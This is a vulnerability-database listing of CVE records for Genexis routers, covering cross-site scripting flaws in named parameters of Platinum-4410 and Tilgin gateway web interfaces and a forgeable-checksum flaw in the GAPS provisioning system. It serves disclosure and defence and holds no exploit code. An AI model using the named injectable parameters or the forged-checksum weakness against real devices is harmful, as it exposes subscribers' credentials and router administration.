Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
17 vulnerabilities by genexis
CVE-2021-47858 (GCVE-0-2021-47858)
Vulnerability from nvd – Published: 2026-01-21 17:27 – Updated: 2026-03-05 01:28 Unsupported When Assigned- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/49709 | exploit |
| https://genexis.eu/product/platinum-series/ | product |
| https://www.vulncheck.com/advisories/genexis-plat… | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Platinum-4410 |
Affected:
Firmware 1.31A
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47858",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T22:08:28.917335Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T22:08:58.787Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Platinum-4410",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "Firmware 1.31A"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:genexis:platinum-4410:v2:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:genexis:platinum-4410_firmware:1.28:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jithin KS"
}
],
"datePublic": "2020-03-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the \u0027start_addr\u0027 parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-05T01:28:55.504Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-49709",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/49709"
},
{
"name": "Genexis Product Page",
"tags": [
"product"
],
"url": "https://genexis.eu/product/platinum-series/"
},
{
"name": "VulnCheck Advisory: Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/genexis-platinum-p-a-startaddr-persistent-cross-site-scripting"
}
],
"tags": [
"unsupported-when-assigned"
],
"title": "Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47858",
"datePublished": "2026-01-21T17:27:40.393Z",
"dateReserved": "2026-01-14T17:11:19.904Z",
"dateUpdated": "2026-03-05T01:28:55.504Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-8022 (GCVE-0-2024-8022)
Vulnerability from nvd – Published: 2024-08-20 23:31 – Updated: 2024-08-22 13:53- CWE-79 - Cross Site Scripting
| URL | Tags |
|---|---|
| https://vuldb.com/?id.275291 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.275291 | signaturepermissions-required |
| https://vuldb.com/?submit.389913 | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Tilgin Home Gateway |
Affected:
322_AS0500-03_05_13_05
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-8022",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-22T13:53:14.296828Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-22T13:53:24.884Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Tilgin Home Gateway",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "322_AS0500-03_05_13_05"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "The_Druk (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been rated as problematic. This issue affects some unknown processing of the file /vood/cgi-bin/vood_view.cgi?lang=EN\u0026act=user/spec_conf\u0026sessionId=86213915328111654515\u0026user=A\u0026message2user=Account%20updated. The manipulation of the argument Phone Number leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Eine Schwachstelle wurde in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05 ausgemacht. Sie wurde als problematisch eingestuft. Es geht hierbei um eine nicht n\u00e4her spezifizierte Funktion der Datei /vood/cgi-bin/vood_view.cgi?lang=EN\u0026act=user/spec_conf\u0026sessionId=86213915328111654515\u0026user=A\u0026message2user=Account%20updated. Mittels dem Manipulieren des Arguments Phone Number mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk angegangen werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 4,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T23:31:03.646Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-275291 | Genexis Tilgin Home Gateway cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.275291"
},
{
"name": "VDB-275291 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.275291"
},
{
"name": "Submit #389913 | Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05 Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.389913"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-08-20T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-08-20T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-08-20T20:07:07.000Z",
"value": "VulDB entry last update"
}
],
"title": "Genexis Tilgin Home Gateway cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-8022",
"datePublished": "2024-08-20T23:31:03.646Z",
"dateReserved": "2024-08-20T18:01:40.875Z",
"dateUpdated": "2024-08-22T13:53:24.884Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-6355 (GCVE-0-2024-6355)
Vulnerability from nvd – Published: 2024-06-26 21:00 – Updated: 2024-08-01 21:33- CWE-79 - Cross Site Scripting
| URL | Tags |
|---|---|
| https://vuldb.com/?id.269755 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.269755 | signaturepermissions-required |
| https://vuldb.com/?submit.359289 | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Tilgin Fiber Home Gateway HG1522 |
Affected:
CSx000-01_09_01_12
|
|
| genexis | tilgin_fiber_home_gateway_hg1522 |
Affected:
csx000_01_09_01_12
cpe:2.3:a:genexis:tilgin_fiber_home_gateway_hg1522:csx000_01_09_01_12:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:genexis:tilgin_fiber_home_gateway_hg1522:csx000_01_09_01_12:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "tilgin_fiber_home_gateway_hg1522",
"vendor": "genexis",
"versions": [
{
"status": "affected",
"version": "csx000_01_09_01_12"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-6355",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-27T13:18:19.856295Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T13:26:45.170Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:33:05.432Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "VDB-269755 | Genexis Tilgin Fiber Home Gateway HG1522 cross site scripting",
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.269755"
},
{
"name": "VDB-269755 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.269755"
},
{
"name": "Submit #359289 | Tilgin FIBER HOME GATEWAY HG1522 HG13xxx_CSx000-01_09_01_12 Cross Site Scripting",
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://vuldb.com/?submit.359289"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Tilgin Fiber Home Gateway HG1522",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "CSx000-01_09_01_12"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "The_Druk (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Genexis Tilgin Fiber Home Gateway HG1522 CSx000-01_09_01_12. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /status/product_info/. The manipulation of the argument product_info leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269755. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "In Genexis Tilgin Fiber Home Gateway HG1522 CSx000-01_09_01_12 wurde eine problematische Schwachstelle ausgemacht. Es geht um eine nicht n\u00e4her bekannte Funktion der Datei /status/product_info/. Mit der Manipulation des Arguments product_info mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 5,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T21:00:05.252Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-269755 | Genexis Tilgin Fiber Home Gateway HG1522 cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.269755"
},
{
"name": "VDB-269755 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.269755"
},
{
"name": "Submit #359289 | Tilgin FIBER HOME GATEWAY HG1522 HG13xxx_CSx000-01_09_01_12 Cross Site Scripting",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.359289"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-06-26T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-06-26T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-06-26T18:28:46.000Z",
"value": "VulDB entry last update"
}
],
"title": "Genexis Tilgin Fiber Home Gateway HG1522 cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-6355",
"datePublished": "2024-06-26T21:00:05.252Z",
"dateReserved": "2024-06-26T16:23:42.937Z",
"dateUpdated": "2024-08-01T21:33:05.432Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-6108 (GCVE-0-2024-6108)
Vulnerability from nvd – Published: 2024-06-18 10:00 – Updated: 2024-08-01 21:33- CWE-80 - Basic Cross Site Scripting
| URL | Tags |
|---|---|
| https://vuldb.com/?id.268854 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.268854 | signaturepermissions-required |
| https://vuldb.com/?submit.353708 | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Tilgin Home Gateway |
Affected:
322_AS0500-03_05_13_05
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-6108",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-25T17:57:09.219869Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T17:57:17.846Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:33:05.244Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "VDB-268854 | Genexis Tilgin Home Gateway Login cross site scripting",
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.268854"
},
{
"name": "VDB-268854 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.268854"
},
{
"name": "Submit #353708 | tilgin Residential Gateway 322_AS0500-03_05_13_05 Injection",
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://vuldb.com/?submit.353708"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"modules": [
"Login"
],
"product": "Tilgin Home Gateway",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "322_AS0500-03_05_13_05"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "The_Druk (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been classified as problematic. Affected is an unknown function of the file /vood/cgi-bin/vood_view.cgi?act=index\u0026lang=EN# of the component Login. The manipulation of the argument errmsg leads to basic cross site scripting. It is possible to launch the attack remotely. VDB-268854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Es wurde eine problematische Schwachstelle in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05 ausgemacht. Betroffen hiervon ist ein unbekannter Ablauf der Datei /vood/cgi-bin/vood_view.cgi?act=index\u0026lang=EN# der Komponente Login. Durch die Manipulation des Arguments errmsg mit unbekannten Daten kann eine basic cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff \u00fcber das Netzwerk."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 5,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-80",
"description": "CWE-80 Basic Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-18T10:00:04.950Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-268854 | Genexis Tilgin Home Gateway Login cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.268854"
},
{
"name": "VDB-268854 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.268854"
},
{
"name": "Submit #353708 | tilgin Residential Gateway 322_AS0500-03_05_13_05 Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.353708"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-06-18T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-06-18T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-06-18T07:13:46.000Z",
"value": "VulDB entry last update"
}
],
"title": "Genexis Tilgin Home Gateway Login cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-6108",
"datePublished": "2024-06-18T10:00:04.950Z",
"dateReserved": "2024-06-18T05:06:31.620Z",
"dateUpdated": "2024-08-01T21:33:05.244Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-6094 (GCVE-0-2017-6094)
Vulnerability from nvd – Published: 2017-12-20 20:00 – Updated: 2024-08-05 15:18- n/a
| URL | Tags |
|---|---|
| http://seclists.org/fulldisclosure/2017/Dec/62 | mailing-listx_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T15:18:49.781Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20171219 CVE-2017-6094 - Genexis GAPS Access Control Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2017/Dec/62"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-12-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain \"chk\" value (48bit) derived from the MAC. The algorithm used to compute the \"chk\" was disclosed by reverse engineering the CPE\u0027s firmware. As a result, it is possible to forge valid \"chk\" values for any given MAC address and therefore receive the configuration settings of other subscribers\u0027 CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-12-20T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20171219 CVE-2017-6094 - Genexis GAPS Access Control Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2017/Dec/62"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-6094",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain \"chk\" value (48bit) derived from the MAC. The algorithm used to compute the \"chk\" was disclosed by reverse engineering the CPE\u0027s firmware. As a result, it is possible to forge valid \"chk\" values for any given MAC address and therefore receive the configuration settings of other subscribers\u0027 CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20171219 CVE-2017-6094 - Genexis GAPS Access Control Vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2017/Dec/62"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-6094",
"datePublished": "2017-12-20T20:00:00.000Z",
"dateReserved": "2017-02-18T00:00:00.000Z",
"dateUpdated": "2024-08-05T15:18:49.781Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-47858 (GCVE-0-2021-47858)
Vulnerability from cvelistv5 – Published: 2026-01-21 17:27 – Updated: 2026-03-05 01:28 Unsupported When Assigned- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/49709 | exploit |
| https://genexis.eu/product/platinum-series/ | product |
| https://www.vulncheck.com/advisories/genexis-plat… | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Platinum-4410 |
Affected:
Firmware 1.31A
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47858",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T22:08:28.917335Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T22:08:58.787Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Platinum-4410",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "Firmware 1.31A"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:genexis:platinum-4410:v2:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:genexis:platinum-4410_firmware:1.28:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jithin KS"
}
],
"datePublic": "2020-03-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the \u0027start_addr\u0027 parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-05T01:28:55.504Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-49709",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/49709"
},
{
"name": "Genexis Product Page",
"tags": [
"product"
],
"url": "https://genexis.eu/product/platinum-series/"
},
{
"name": "VulnCheck Advisory: Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/genexis-platinum-p-a-startaddr-persistent-cross-site-scripting"
}
],
"tags": [
"unsupported-when-assigned"
],
